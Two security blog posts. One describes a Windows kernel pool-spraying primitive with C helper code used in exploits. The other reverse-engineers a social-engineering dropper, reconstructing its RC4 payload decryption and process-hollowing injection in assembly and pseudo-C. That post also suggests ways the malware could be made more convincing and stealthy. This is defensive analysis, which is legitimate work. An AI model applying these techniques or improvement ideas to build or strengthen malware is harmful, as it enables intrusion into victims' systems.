Saturday, April 7, 2012

Allocating (nearly) arbitary kernel pool blocks using win32k!NtUserCreateAcceleratorTable

Hopefully the title of this post is fairly self-explanatory. Being able to allocate blocks of a controlled size in this way has obvious implications in exploiting almost any kind of bug related to the kernel pool.
This technique is nice because you can allocate multiple controlled block sizes with no collateral overhead, leading to a cleaner pool 'massaging' process.

The relavent code from win32k.sys looks a little bit like this:

HACCEL NtUserCreateAcceleratorTable(LPACCEL paccel,int cAccel)
{
    ...
    CreateAcceleratorTable(paccel, cAccel * 6);
    ...
}

HANDLE CreateAcceleratorTable(LPACCEL paccel, int cAccel)
{
    ...
    HMAllocObject(gptiCurrent, 0, 8, cAccel + 12);
    ...
}


HMAllocObject will allocate an object of (cAccel + 12) in the kernel pool via HeavyAllocPool and attach it to the current (calling) process by placing the handle in the current user handle table. Due to user handle limitiations, you can only allocate a maximum of 65535 (0xffff) buffers using this technique. Windows 7 imposes a limit of 32767 (0x7FFF) bytes per allocation.

Allocations can be freed by using the NtUserDestroyAcceleratorTable system call (or the DestroyAcceleratorTable API call).

The code I use in my exploits is shown below. I generally compile it as a separate object and link it into those exploits that need it.

#include <windows.h>

#pragma comment(lib,"user32.lib")

HANDLE PoolAllocViaAccelTable(DWORD count)
{
    DWORD d;
    HANDLE ret;
    char *buff;
   
    d = (count - 12);
   
    if(d % 6 != 0)
    {
        /* Cannot allocate this amount directly */
        return((HANDLE)-1);
    }
   
    buff = (char *) malloc(count + 8);
   
    if(buff == NULL)
    {
        return((HANDLE)-1);
    }
   
    memset(buff, 0x0, count);
   
    ret = CreateAcceleratorTable(buff, (d / 6));
   
    free(buff);
   
    return(ret);
}

Wednesday, November 2, 2011

Monday, July 25, 2011

Malware: Reversing "Ashley's Nude Pictures.exe"

1 Introduction

The following is a dissassembly and reverse engineering session of a malware sample[1] which was found being spammed to various social forums. The poster claimed that the file contained nude photos of his sister obtained while "fixing her laptop".

Given that the vast majority of executables distributed in this way turn out to be malicious in nature I uploaded it to VirusTotal with mixed results.

Out of all the Anti Virus programs on VirusTotal, only Avast versions 4 and 5 detected the sample as malicious, both identifying it as a verision of ProRAT[2]. However, even a cursory glance at the import table of this binary shows that it is neither a fully-fledged RAT nor has it been packed with any traditional packer (which could otherwise significantly skew detection results).

Intrigued by this I decided to investigate the binary further.

2 First Pass Information

When I first open up a binary in IDA, the first thing I will often do is to immediately check out the string and import tables. There are a couple of reaons for doing this.

First, a binary may give a lot of information away via these tables. String data can often be used to pinpoint the invocation of various operations that we want to trace or intercept such as file operations, pop up boxes etc and import data will tell us what external functions a binary uses and thus what operations it's equiped to carry out.

Secondly, we can often imply a lot of information simply from the state of these tables. Packed or obfuscated binaries, such as many instances of malware, will often encrypt strings and either mangle or completely forgo the import table.

2.1 String Table

In the case of this particular binary the string table isn't too enlighening in terms of what the program actually does, although there are a few informative tid bits.

../../../../gcc-4.4.1/libgcc/../gcc/config/i386/cygming-shar

Couldn't retrieve name of GCClib shared data atom

-GCCLIBCYGMING-EH-TDM1-SJLJ-GTHR-MINGW32
In particular, the strings above show us that the binary was compiled by gcc from the mingw
(http://www.mingw.org) suite.

Another interesting set of strings contain the names of Microsoft Windows versions (2000, XP, Vista etc).  Given that the purported purpose of this binary is to be a self-extracting archive, what use would such information be to it?

2.2 Import Directory

The import table sheads some light on this question. We can immediately see that the binary imports the Windows API function GetVersionA, which obtains the version of the operating system the binary is running under. This would seem to suggest that the binary obtains the current operating system and checks to make sure it can run under it.

Beyond this there are no really suspicious functions being imported here, other than the partial giveaway of the Windows API function GetProcAddress. This function indicates that the binary is performing runtime DLL linking in addition to the compile-time linking displayed by the import table. So at the very least there is more to this binary than meets the eye.

Additionally, there are the Windows API functions FindResourceA, LoadResource and LockResource. These functionare are used to manipulate resources, such as icons, images and GUI components, within the PE executable. With this in mind, I decided to explore the resource section of the binary.

2.3 The Resource Section

By opening up the binary file in  PE Explorer we can immediately see that it has two resource files embedded within it.

The first is named X and is 40448 bytes long. The other is named Z and is 15 bytes long.

As it is plausible, although somewhat unlikely for a supposed self-extracting archive to store its files in the resource section I dumped out the longer file to analyse it. However, immediately upon examining it in a hex editor we can tell that it is obviously not a standard image file, but rather some seemingly managled data.

Potentially this could be a compressed image file, although this would be somewhat odd as most photo formats (i.e. jpeg) already use compression by default.

3 Disassembly


3.1 Dead code.

One of the first noticable things about this binary is the amount of 'dead' code it contains. When code is referred to as 'dead', it means that parts of the program, while valid code, are not actually executed at any point via the main program logic.

IDA Pro generally does a very good job of indentifying functions, although it can sometimes miss functions inserted into call tables such as in Windows drivers and IAT and SSDT hooks (this is because, to avoid confusion, IDA only marks as a function code it can find a path to from the original program entry point).

In this binary there are a number of obvious functions that IDA does not recognize. On further inspection it becomes obvious that there is no obvious call path to these functions from the application's entry point. As a lot of these 'dead' functions go on to call Windows API functions, I broke on the following addresses and ran the program in order to verify whether or not these supposedly dead functions were being called via some path that IDA was unable to recognise:
MapViewOfFile
CreateFileA
CreateFileMappingA
GetVersionEx
None of the above functions were called during a normal program execution, leading us to believe that the functions that call these procedures are in fact dead code.

With this in mind we have to ask ourselves why has this code been included but not executed by a any normally invoked code path?

There are a number of potential reasons for this. One very good reason is that due to how the spreader of this malware wanted it to be percieved it should at least pretend to act like a self-extracting zip file. Any exectable that acts in this way would need to call functions such as CreateFile and therefore having them in its input table, even if it doesn't need to call them, would help lend credability to the program.

Another potentially good reason for this is that the author of the malware wanted to be able to bypass Anti Virus scanners. One way to to do this is to add in extra code to the binary so as to eliminate any signatures that Anti Virus programs may be picking up on.

In any case, the code in question was not executed during a normal program run and was thus excluded from my analysis.

3.2 The Resource Extractor

After some fairly simple code tracing from the entry point, the first function of real note that we come to is what I've nicknamed the Resource Extractor and which can be found starting at address 00402028.

Fairly linear in structure, this routine begins by creating a mutex named sdcascdasds and then procedes to use a set of standard functions - calling in turn FindResourceA, LoadResource and LockResource on the embedded resources X and Z.

The only inteesting code in this function is the continual calls to  GetModuleFileNameA and LocalAlloc. These happen in loops of 600,000 iterations and are probably added to bypass Anti Virus heuristics in some way. One example of such a loop is given below:
.text:00402088 loc_402088:
.text:00402088     mov     [esp+148h+var_140], 0
.text:00402090     mov     [esp+148h+var_144], 0
.text:00402098     mov     [esp+148h+var_148], 0
.text:0040209F     call    GetModuleFileNameA
.text:004020A4     sub     esp, 0Ch        ; uFlags
.text:004020A7     mov     [esp+148h+var_144], 0Ch
.text:004020AF     mov     [esp+148h+var_148], 0
.text:004020B6     call    LocalAlloc
.text:004020BB     sub     esp, 8          ; hModule
.text:004020BE     mov     [esp+148h+var_140], 0
.text:004020C6     mov     [esp+148h+var_144], 0
.text:004020CE     mov     [esp+148h+var_148], 0
.text:004020D5     call    GetModuleFileNameA
.text:004020DA     sub     esp, 0Ch        ; hModule
.text:004020DD     inc     ebx
.text:004020DE     cmp     ebx, 927BEh
.text:004020E4     jnz     short loc_402088
Having loaded the embedded resources into memory, it pushes their start addresses onto the stack and calls the function at 00401328. If we look at the order that the values are copied onto the stack we can surmise that the this function has a prototype a little something like:
function(void *X_data, void *Z_data, int X_len, int Z_len);
If we cheat a little bit and look at the code after the call to this function, we can see that the result (stored in eax) is used as a parameter to the next function at address 00401CD0. By peeking ahead a bit more we can see this function in turn perform the following comparisons on this data:
00401D56    cmp    word ptr [ebx], 5A4Dh
...
00401D6F    cmp    dword ptr [eax], 4550h
The first compare is checking for the bytes "MZ" at the start of the data, the other is looking for the bytes "PE" at a certain offset into the data. Both of these are dead givaways that  this function is expecting a PE executable file.

Therefore, we can expect that the function at 00401328 will most likely decrypt the data in the X resource leaving it as a PE executable.

3.3 The Decryption Routine (00401328)

From an initial analysis of this function, we can immediately tell that it's a lot more involved than what we've seen up until now. There are no function calls from this function, only a series of loops and involved data copies. This means that rather than simply trace function parameters and return values as we did in the last function, we're going to actually have to trace through the logic to see what it does.

Given what we learned in the previous function, it seems reasonable to assume that this function might perform some kind of decryption, although we won't know until we work our way through.
function:
    push    ebp
    mov     ebp, esp
    push    edi
    push    esi
    push    ebx
    sub     esp, 404h
    xor     eax, eax
    lea     esi, [ebp+var_40C]
This initial block of code is very standard. It saves the frame pointer on the stack via the push instruction, copies the esp into ebp to create a new frame and then saves the values of  edi, esi and ebx.

After doing this it subtracts 1028 (404h) bytes from esp - this essentially gives this function 1028 bytes of local (stack) variable space to play with.

To finish this block sets eax to zero and loads the address of a stack variable into the esi register.
.text:0040133C loc_40133C:
.text:0040133C     mov     [esi+eax*4], eax
.text:0040133F     inc     eax
.text:00401340     cmp     eax, 100h
.text:00401345     jnz     short loc_40133C
.text:00401347     xor     ebx, ebx
.text:00401349     xor     ecx, ecx
.text:0040134B     nop
This next block is really rather simple and we can tell immediately that it's a loop, counting from 0 to 255 (< 256 or 100h).

The loops copies the value of eax (which enters the loop set to zero) into the variable pointed to esi at the offset [eax * 4].

If we were to convert this simple into C, it may look a little something like that.
int table[256];

for(i = 0; i < 256; i++)
{
    table[i] = i;
}
Let's move on to the next block of code.
.text:0040134C loc_40134C:
.text:0040134C     mov     edi, [esi+ecx*4]
.text:0040134F     add     ebx, edi
.text:00401351     mov     [ebp+var_410], ebx
.text:00401357     mov     eax, ecx
.text:00401359     xor     edx, edx
.text:0040135B     div     [ebp+arg_C]
.text:0040135E     mov     ebx, [ebp+arg_4]
.text:00401361     movzx   eax, byte ptr [ebx+edx]
.text:00401365     add     eax, [ebp+var_410]
.text:0040136B     mov     ebx, 0ECh
.text:00401370     cdq
.text:00401371     idiv    ebx
.text:00401373     lea     ebx, [edx+14h]
.text:00401376     mov     eax, [ebp+ebx*4+var_40C]
.text:0040137D     mov     [esi+ecx*4], eax
.text:00401380     and     edi, 0FFh
.text:00401386     mov     [ebp+ebx*4+var_40C], edi
.text:0040138D     inc     ecx
.text:0040138E     cmp     ecx, 100h
.text:00401394     jnz     short loc_40134C ; loop
.text:00401396     mov     eax, [ebp+arg_8]
.text:00401399     test    eax, eax
.text:0040139B     jz      short loc_4013FF
.text:0040139D     xor     esi, esi
.text:0040139F     nop
Again, this is a basic loop which we can tell from the two instructions at 0040138E and 00401394.
The loop begins by retrieving data from the same table that was manipulated in the previous loop (stored in esi). The index and loop counter is in ecx.
This retrieved value is added to ebx, which enters the loop set to zero, and stored in a stack variable.
 
The next sequence starting at 00401357 is a good example of how modulo maths is executed at the assembly level.

A good example of a use of modular maths would be the following:
int arraylen = 400;
char array[arraylen+3];
int index = 600;

array[index % arraylen] = 1;
In C the expression index % arraylen divides index by arraylen and returns the remainder.

In our example, 400 goes into 600 once with 200 left over; so our code would be the equivelent of:
array[200] = 1;
At the assembly level this maths is performed by the div instruction.
.text:00401357     mov     eax, ecx
.text:00401359     xor     edx, edx
.text:0040135B     div     [ebp+arg_C]
.text:0040135E     mov     ebx, [ebp+arg_4]
.text:00401361     movzx   eax, byte ptr [ebx+edx]
Here we see ecx, the loop counter, being copied into eax and edx being set to zero. The following div instruction causes eax to be divided by the fourth function argument, which we know to be the length of the data in the Z resource. This causes the quotient (the number of times that length goes into ecx) to be stored in eax, and the remainder to be stored in edx.

edx is then used as an index when copying data from the second function argument.

In C, given the loops above might look a little something like this:
unsigned int i;
unsigned int b;
unsigned int table[256];
unsigned int c;
unsigned int d = 0

for(i = 0; i < 256; i++)
{   
    c = table[i];
    d += c;
    b = Z_data[i % Z_len];
}
d = 0;

for(i = 0; i < 256; i++)
{
        c = table[i];

        d += c;

        d = (d + Z_data[i % Z_len]) % 256;

        table[i] = table[d];
        table[d] = c;
}
To anyone even vaguely interested in or exposed to cryptography this should be starting to look somewhat familier - what we are seeing here is basically the key initialization for an ARC4 implementation. If this is correct, if we set a breakpoint at 00401402 we should see a 40448 byte PE executable file starting at the address held in eax.

As we can see in the screenshot, our initial analysis was correct and we can see the PE executable file data starting
at address 00409104.

In order to facilitate obtaining this second stage payload, I wrote a short script[3] for Immunity Debugger which dumps a specified number of bytes from a given address into an output file. The screenshot below shows this script in use.

As we know from the previous function, this decrypted data is now passed as a parameter to the function at 00401CD0.

3.4 Execution and Injection

If anything, this function is even more linear than the resource extraction routine, and it uses the same heuristics dodging/ofuscation loop as before. By analyzing the parameters pushed on the stack before this function is called we can determine that it has a function definition something like:
void exec_inject(char *filename, void *decrypted_exe)
As noted above, it begins by performs the checks for the bytes "MZ" and "PE" and then begins a series of calls to GetProcAddress(GetModuleHandleA("XXXX"), "YYYY");

As we know, the GetProcAddress Windows API call obtains the addresses of other functions when given a handle to a module and the name of the function.

This program uses GetProcAddress to get the addresses of the following functions:
CreateProcessA
NTUnmapViewOfSection
VirtualAllocEx
NtWriteVirtualMemory
GetThreadContext
NtSetContextThread
ResumeThread
After having resolved the addresses of these functions, the program goes on to call them in turn. To make sense of this code, let's go through it one function call at a time.

The program first creates a new instace of itself by passing its own module file name as the second argument to CreateProcessA(stored in esi).
CreateProcessA(0,"Ashley's Nude Pictures.exe", 0,0,0,4,0,0,&sd,&procinfo);
The trick here is that by passing flags as 00000004 the process is created with the CREATE_SUSPENDED flag meaning that the process will not start running until ResumeThread is called on it.

We know that the NT PE headers are in eax, so [eax] refers to the member at +0 bytes (the first member). Therefore the call to NtUnmapViewOfSection looks like this:
NtUnmapViewOfSection(procinfo->handle, nthdrs->OPTIONAL_HEADER.ImageBase);
Having unmapped the memory at the second stage payload's image base, the process is now free to reallocate that memory using VirtualAllocEx:
VirtualAllocEx(procinfo->handle, nthdrs->OPTIONAL_HEADER.ImageBase, nthdrs->OPTIONAL_HEADER.SizeOfImage, 0x3000, 0x40);
And then copy its own headers back into the same memory space:
NtWriteVirtualMemory(procinfo->handle, nthdrs->OPTIONAL_HEADER.ImageBase, nthdrs->OPTIONAL_HEADER.SizeOfHeaders, 0);
Next we come to the following loop
.text:00401FC6     mov     edx, ds:dword_40700C
.text:00401FCC     add     edi, 28h
.text:00401FCF     movzx   eax, word ptr [edx+6]
.text:00401FD3     cmp     eax, esi
.text:00401FD5     jg      short loc_401F7D
.text:00401F7D loc_401F7D:
.text:00401F7D     mov     eax, ds:dword_407008
.text:00401F82     mov     eax, [eax+3Ch]
.text:00401F85     lea     eax, [edi+eax+0F8h]
.text:00401F8C     lea     eax, [ebx+eax]
.text:00401F8F     mov     ds:dword_407010, eax
.text:00401F94     mov     [esp+3E0h+var_3D0], 0
.text:00401F9C     mov     ecx, [eax+10h]
.text:00401F9F     mov     [esp+3E0h+var_3D4], ecx
.text:00401FA3     mov     ecx, [eax+14h]
.text:00401FA6     add     ecx, ebx
.text:00401FA8     mov     [esp+3E0h+var_3D8], ecx
.text:00401FAC     mov     eax, [eax+0Ch]
.text:00401FAF     add     eax, [edx+34h]
.text:00401FB2     mov     [esp+3E0h+var_3DC], eax
.text:00401FB6     mov     eax, [ebp+var_28]
.text:00401FB9     mov     [esp+3E0h+var_3E0], eax
.text:00401FBC     call    [ebp+NTWriteVirtualMemory]
.text:00401FC2     sub     esp, 14h
.text:00401FC5     inc     esi
.text:00401FC6     mov     edx, ds:dword_40700C
.text:00401FCC     add     edi, 28h
.text:00401FCF     movzx   eax, word ptr [edx+6]
.text:00401FD3     cmp     eax, esi
.text:00401FD5     jg      short loc_401F7D
At first view the code here appears to be a nightmare. We can see that's referencing decrypted_exe (stored in dword_407008) and the IMAGE_NT_HEADERS (stored in dword_40700C). We can tell that the loop counter is stored in esi and that the loop is only entered if nthdrs->FileHeader->NumberOfSections is greater than zero. Usually this kind of assembly logic is representative of a for or while loop in C of the type:
while(i < nthdrs->FileHeader->NumberOfSections)
{
    ...
}
The second clue is that at each loop iteration offset is being incremented  by 40 bytes, which just happens to be the sizeof(IMAGE_SECTION_HEADER).

From this we can surmise that this loop is traversing the section headers and, as we can see from the assembly, copying and manipulating data from within the structures IMAGE_SECTION_HEADER, IMAGE_NT_HEADERS and IMAGE_DOS_HEADER.

Usually it would be an absolute nightmare to count offsets into structures to find out what members each assembly operation is accessing. Luckily IDA allows us to cut right through this.

By adding standard structures from IDA's Structures tab, highlighting individual offsets and hitting the hotkey t we are able to select a representative structure definition and voila - the correct member for that offset is calculated and displayed directly in the disassembly.

Looking at the IDA screenshot we can already see that the code is massively improved  - suddenly we can tell exactly what the code is doing.

Armed with the correct member names we can quickly convert all of the preceding code into pseudo-C:
PIMAGE_DOS_HEADER doshdr = decrypted_exe;
PIMAGE_NT_HEADERS nthdrs = decrypted_exe + doshdr->e_lfanew;
PPROCESS_INFORMATION procinfo;

CreateProcessA(0,"Ashley's Nude Pictures.exe", 0,0,0,4,0,0,&hu,&procinfo);

NtUnmapViewOfSection(procinfo->hProcess, ntdhrs->OPTIONAL_HEADER.ImageBase);

VirtualAlloc(procinfo->hProcess, nthdrs->OPTIONAL_HEADER.ImageBase, nthdrs->OPTIONAL_HEADER.SizeOfImage, 0x3000, 0x40);

NtWriteVirtualMemory(procinfo->hProcess,nthdrs->OPTIONAL_HEADER.ImageBase, decrypted_exe, nthdrs->OPTIONAL_HEADER.SizeOfHeaders, 0);

int offset = 0;
int i =0 ;

while(i < nthdrs->FileHeader.NumberOfSections)
{
    PIMAGE_SECTION_HEADER shdr;

    shdr = decrypted_exe + (doshdr->e_lfnew + sizeof(IMAGE_NT_HEADERS) + offset);

    NtWriteVirtualMemory(procinfo->hProcess, shdr->VirtualAddress + nthdrs->OPTIONAL_HEADER.ImageBase , decrypted_exe + shdr->PointerToRawData, shdr->SizeOfRawData, 0);

    offset += 40;
    i++;
}
Essentially this loop is going through the section headers one by one and copying the section data into the new process at the correct address.
GetThreadContext(procinfo->hThread, &context);

context->eax = IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint + IMAGE_NT_HEADERS.OptionalHeader.ImageBase;

NtSetContextThread(proinfo->hThread, &context);
Next, the GetThreadContext and NtSetContextThread functions are used to first obtain the thread's context (register set), modify eax to point to the new entry point (calculated as IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint + IMAGE_NT_HEADERS.OptionalHeader.ImageBase) and commit the new context back to the process' main thread.

Finally the ResumeThread function is called to resume the new process and thereby launch a malicious executable without ever having to write the file to disk, a technique sometimes referred to as Nebbett's Shuttle.
ResumeThread(procinfo->hThread);
4 Conclusions

To conclude, this sample is taking an rc4 encrypted binary and an rc4 key from its resource section, using the key to decrypt the binary and using Nebett's Shuttle to execute this binary in a somewhat stealthy fashion.

We can consider this sample to be a kind of crypter/dropper using very similar techniques to that seen in VBInject/VBCrypt/RunPE[4], albeit written in C++ rather than Visual Basic.

The large amount of dead code in this sample leads me to believe it's not a commercial or widely distributed product. I tend to believe that the attacker constructed it out of scraps of source code and example snippets. Often when an inexperienced programmer is manipulating code he doesn't understand he will be loathe to remove sections for fear of breaking his program.

It follows that the attacker/spreader built this program, possibly out of scraps of sample and example code before compiling with the freeware compiler mingw in order to hide the execution of a more common and/or commercial malware, although we will only find this out for sure upon analysing the second stage executable.

Below are a few ideas of how the author could have potentially improved this malware:

The first and easiest way to improve this malware would have been to have used a correct icon for the program. Using an icon corresponding to a Winzip self-extracting archive, for example would have lent an air of authenticity to the program.

Taking this further, the attacker could have added functionality for the program to dump out actual photo files to the hard disk, only performing the exe injection attack at the end.

The logical conclusion of this would be to name the file something like archive.zip.exe, use a correct zipfile icon and have the program emulate the Windows' zipfile extraction wizard. Although this may not help with foiling reverse engineering of the file, it would probably increase the malware's success rate dramatically.

A better alternative to executing a second, suspended, instance of the malware before loading the second stage exe over the top would be to relocate the second stage exe and write it into local VirtualAlloc'd memory before transfering control to the new entry point. This is the technique currently used by cutting-edge malware such as Zeus when performing non-PIC remote process code injection without DLLs and I think it would work just as well within a local process when wanting to perform stealth process execution.
What I found most interesting was that a large number of Anti-virus software did not detect this malware at all, and those that did detect it got it completely wrong. I therefore guess you could lable this a "zero-day" (albiet extremely lame) malware sample.

In the next few weeks (work, life and phases of the moon permitting) I hope to go on to analyze the second stage payload and if I'm successful I'll post the results up here.

5 References
[1] https://sites.google.com/site/ushirokesa/files/stash.zip?attredirects=0&d=1
[2] http://www.prorat.net/main.php?language=english
[3] https://sites.google.com/site/ushirokesa/files/dumptofile.py?attredirects=0&d=1
[4] http://interestingmalware.blogspot.com/2010/07/unpacking-vbinjectvbcryptrunpe.html